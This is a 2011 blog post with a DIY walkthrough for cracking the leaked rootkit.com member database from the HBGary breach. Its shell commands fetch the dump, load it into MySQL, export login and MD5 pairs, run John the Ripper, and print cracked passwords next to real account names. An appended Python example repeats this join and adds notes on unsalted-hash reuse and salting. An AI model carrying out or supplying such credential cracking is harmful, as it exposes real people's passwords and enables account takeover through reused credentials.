20110211

DIY - Brute force rootkit.com passwords

Off the back of the HBGary database walk, a site popped up that published all the clear text passwords: http://dazzlepod.com/rootkit/
Before I had a chance to have a look around, it was down, then came back again without the passwords, citing breach of the hosting service AUP.  Meh, do it yourself I says...

Dust off your BT4 distro or whatever and...
1) Download the SQL database from a reputable source.

# wget http://stfu.cc/rootkit_com_mysqlbackup_02_06_11.gz

2) Start mysqld and create a database.

# /etc/init.d/mysqld start
# echo "create database rootkit_com;" |\
   mysql --user=root --password=toor
# echo "show databases;" |\
   mysql --user=root --password=toor

3) Unzip your download and feed it to mysql.

# gzip -dc rootkit_com_mysqlbackup_02_06_11.gz |\
   mysql --user=root --password=toor rootkit_com
# echo "show tables;" |\
   mysql --user=root --password=toor rootkit_com

4) Pull out account and password info in a format that JTR can read.

# (cat <<MEH
SELECT login, password
FROM people
INTO OUTFILE '/tmp/rootkitpw.txt'
FIELDS TERMINATED BY ':'
LINES TERMINATED BY '\n'
MEH
) > pullpw.sql
# mysql --user=root --password=toor rootkit_com < pullpw.sql
# wc -l /tmp/rootkitpw.txt
81450 /tmp/rootkitpw.txt
# mv /tmp/rootkitpw.txt /pentest/password/jtr

5) Crank up John the Ripper.

# cd /pentest/password/jtr
# ./john --format=raw-MD5 rootkitpw.txt

6) Wait a little while and check on the progress... (the script reads john.pot, joins each cracked hash back to the export from step 4, and outputs hash, password & account)

# (IFS=:
   printf "%-34s %-15s %s\n" "raw-MD5" "Password" "Account"
   printf "%-34s %-15s %s\n" "-------" "--------" "-------"
   # john.pot lines are hash:password; with IFS=: the first field is the hash
   # and everything after the first colon lands in PASS
   while read -r HASH PASS; do
      # find every account in the step-4 export that carries this hash
      grep "${HASH}" rootkitpw.txt | while read -r ACCT FOOHASH; do
         printf "%-34s %-15s %s\n" "${HASH}" "${PASS}" "${ACCT}"
      done
   done < john.pot) | less

7) If you're interested in confirming a password, compare the hash... (the \c stops echo emitting a trailing newline, so md5sum hashes exactly the four bytes of "test")

# echo -e "test\c" | md5sum
098f6bcd4621d373cade4e832627b4f6  -
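The join from step 6 and the check from step 7, written out as an added Python example (this is not the original post's script). It parses the login:hash export the step-4 query writes and a john.pot, joins them into the same hash/password/account table, verifies a candidate the way step 7 does with md5sum, and adds the check a defender wants: unsalted MD5 lets you see password reuse across accounts without cracking anything, which a per-user salt plus PBKDF2 (shown for contrast) prevents. The export and pot contents below are constructed; the logins are made up, the hashes are real MD5 digests of the strings noted, and the `$dynamic_0$` tag handling is an assumption about how newer john builds label raw-MD5 entries in john.pot.

```python
"""Join john.pot against the login:hash export and verify hashes.

Added example, not the post's own script. Inputs are constructed inline so
it runs offline; feed it real file contents to use it on a real export.
"""
import hashlib
from collections import defaultdict

# Constructed sample in the login:hash layout the step-4 query writes.
# Hashes are real MD5 digests of "test", "password", "test", "123456";
# the logins are made up.
SAMPLE_EXPORT = """\
alice:098f6bcd4621d373cade4e832627b4f6
bob:5f4dcc3b5aa765d61d8327deb882cf99
carol:098f6bcd4621d373cade4e832627b4f6
dave:e10adc3949ba59abbe56e057f20f883e
"""

# Constructed john.pot contents, hash:password for what john has recovered
# so far ("dave" is deliberately still uncracked).
SAMPLE_POT = """\
098f6bcd4621d373cade4e832627b4f6:test
5f4dcc3b5aa765d61d8327deb882cf99:password
"""

# Assumption: newer john builds prefix raw-MD5 pot entries with this tag.
POT_TAG = "$dynamic_0$"


def parse_export(text):
    """login:hash lines -> list of (login, hash), hash lowercased."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        login, _, digest = line.partition(":")
        records.append((login, digest.strip().lower()))
    return records


def parse_pot(text):
    """john.pot lines -> {hash: password}. Split on the first ':' only,
    because the recovered password may itself contain ':'."""
    cracked = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        digest, _, password = line.partition(":")
        if digest.startswith(POT_TAG):
            digest = digest[len(POT_TAG):]
        cracked[digest.lower()] = password
    return cracked


def md5_hex(candidate):
    """Raw MD5 of the candidate, exactly what step 7 computes with md5sum
    (no trailing newline in the input)."""
    return hashlib.md5(candidate.encode()).hexdigest()


def verify(digest, candidate):
    """Step 7 as a function: does the candidate hash to the stored digest?"""
    return md5_hex(candidate) == digest.lower()


def report(records, cracked):
    """Step 6's join: (hash, password, login) for every login whose hash
    appears in john.pot, ordered by login."""
    rows = [(d, cracked[d], login) for login, d in records if d in cracked]
    return sorted(rows, key=lambda r: r[2])


def duplicate_hash_groups(records):
    """Unsalted hashes expose reuse without cracking: every login sharing a
    digest shares a password. Returns {hash: [logins]} for repeated digests."""
    groups = defaultdict(list)
    for login, digest in records:
        groups[digest].append(login)
    return {d: sorted(l) for d, l in groups.items() if len(l) > 1}


def salted_hash(candidate, salt, rounds=100_000):
    """Contrast: a per-user salt with PBKDF2 yields different digests for the
    same password, so neither the reuse check nor one shared crack applies."""
    return hashlib.pbkdf2_hmac("sha256", candidate.encode(), salt, rounds).hex()


if __name__ == "__main__":
    records = parse_export(SAMPLE_EXPORT)
    cracked = parse_pot(SAMPLE_POT)
    print("%-34s %-15s %s" % ("raw-MD5", "Password", "Account"))
    for digest, password, login in report(records, cracked):
        print("%-34s %-15s %s" % (digest, password, login))
    print("shared hashes:", duplicate_hash_groups(records))
    print("salted:", salted_hash("test", b"salt-a")[:16],
          salted_hash("test", b"salt-b")[:16])
```

Run it directly to see the same three-column table the step-6 pipeline prints, followed by the accounts that share a digest and two salted digests of "test" that no longer match each other.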

exit 0